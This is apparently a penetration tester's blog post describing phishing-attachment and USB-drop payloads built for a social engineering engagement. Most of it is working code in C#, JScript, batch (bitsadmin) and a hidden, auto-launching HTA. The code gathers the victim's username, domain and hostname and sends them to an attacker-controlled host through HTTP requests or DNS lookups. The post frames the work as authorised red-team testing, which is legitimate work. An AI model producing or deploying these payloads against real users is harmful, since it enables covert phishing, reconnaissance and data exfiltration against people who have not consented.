Executable Phishing Payloads
Last week I was working on a social engineering engagement that included pretext phone calls, email phishing, and USB drops. I had to build payloads for the phishing email attachments and USB drops. This engagement was standalone, and therefore was not supporting other testing efforts like an internal pentest. Therefore, the payloads didn’t have to do anything fancy. I just needed proof that they were executed. Ideally, I wanted to collect the following information with each execution:
- Username
- Domain
- Hostname
I needed to build some kind of executable payload that could provide me with that information remotely. I played around with a few ideas and came up with some simple solutions. I thought I’d document them here in case they are useful for anyone else.
Data Exfiltration
Regardless of the type of payload used, I needed a way to exfiltrate the required data back to me remotely. I used two methods to do this. HTTP and DNS.
HTTP Exfiltration
One option was to make an HTTP GET request to a web server I control. The GET request URL parameters would contain the user variables. Something like this:
http://www.MyAttackServer.com/exfiltrate?username=User1&Domain=SomeDomain&Hostname=PC1
I could then run a simple HTTP server on my attack server and log incoming requests.
DNS Exfiltration
Another option I played with was to use DNS to exfiltrate data. In this case, I could generate a hostname like:
username_domain_hostname.MyAttackServer.com
Rather then setup my own DNS entries, I opted to build payloads that specified the DNS server to be MyAttackServer.com. That way the victim machine would connect to my attack server to lookup the IP address for username_domain_hostname.MyAttackServer.com. I ran Responder.py in a screen session with only DNS enabled. Thanks to James for that idea! This created a log of incoming DNS requests I could parse later.
File Formats
I needed a payload that could be executed when a user double clicked it within Windows. There are a variety of executable file formats in Windows. Here are some payloads I put together using the above exfiltration methods and various file formats.
EXE Payload
The most obvious choice was a simple exe file (.exe) payload. I wrote something simple with .NET to exfiltrate the data via HTTP.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Net;
namespace exfil
{
internal class Program
{
static void Main(string[] args)
{
String username = Environment.UserName;
String domain = Environment.UserDomainName;
String host = Environment.MachineName;
string url = @"http://MyAttackServer.com/test.html?u=" + username + "&d=" + domain + "&h=" + host;
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
request.AutomaticDecompression = DecompressionMethods.GZip;
using (HttpWebResponse response = (HttpWebResponse)request.GetResponse());
}
}
}
I also wrote a payload that used DNS to exfiltrate the data. This could be done better by performing the DNS lookup directly in the C# code instead of relying on a separate nslookup process, but this was the quickest and easiest way I could get this working with the DNS server specified as my own server.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace exfil
{
internal class Program
{
static void Main(string[] args)
{
String username = Environment.UserName;
String domain = Environment.UserDomainName;
String host = Environment.MachineName;
System.Diagnostics.Process process = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
startInfo.FileName = "cmd.exe";
startInfo.Arguments = "/C nslookup " + host + "_" + domain + "_" + username + ".MyAttackServer.com MyAttackServer.com";
process.StartInfo = startInfo;
process.Start();
}
}
}
JavaScript
JavaScript (.js) files will execute with cscript.exe by default on Windows. You can do some tricky things with this. I built a payload that used ActiveX to run nslookup for DNS exfiltration. It’s just two lines, but it gets the job done.
// Replace MyAttackServer.com with your own host
var shell = new ActiveXObject('WScript.Shell');
shell.Run('cmd.exe /C nslookup %processor_architecture%_%COMPUTERNAME%_%USERDOMAIN%_%USERNAME%.MyAttackServer.com MyAttackServer.com');
Batch File Payload
Batch files (.bat) are an old school way to write shell scripts on Windows. The below batch script uses bitsadmin.exe to connect back to an attacker-controlled web server. The web server URL parameters contain the data to be exfiltrated. This script could easily be updated to use the DNS exfiltration method.
@ECHO OFF
for /f %%i in ('whoami') do set u=%%i
ECHO %u%
bitsadmin.exe /transfer "exfil" http://MyAttackServer.com/user=%u% C:\windows\temp\test.dll
HTA Payload
HTA files (.hta) can run vbscript and can therefore execute powerful payloads. The below HTA payload exfiltrates data using the HTTP method.
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION icon="#" WINDOWSTATE="normal" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" BORDER="none" SCROLL="no" />
<script type="text/vbscript">
Private Sub Go()
Dim objNetwork : Set objNetwork = CreateObject("WScript.Network")
Dim username
username = objNetwork.UserName
Dim domain
domain = objNetwork.UserDomain
Dim hostname
hostname = objNetwork.ComputerName
Dim url
url = "http://MyAttackServer.com/phish?domain=" & domain & "&username=" & username & "&hostname=" & hostname
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", url & u, False
o.send
End Sub
' Auto launch when VBA enabled
Sub AutoOpen()
Go
End Sub
window.resizeTo 0,0
AutoOpen
Close
</script>
</head>
<body>
</body>
</html>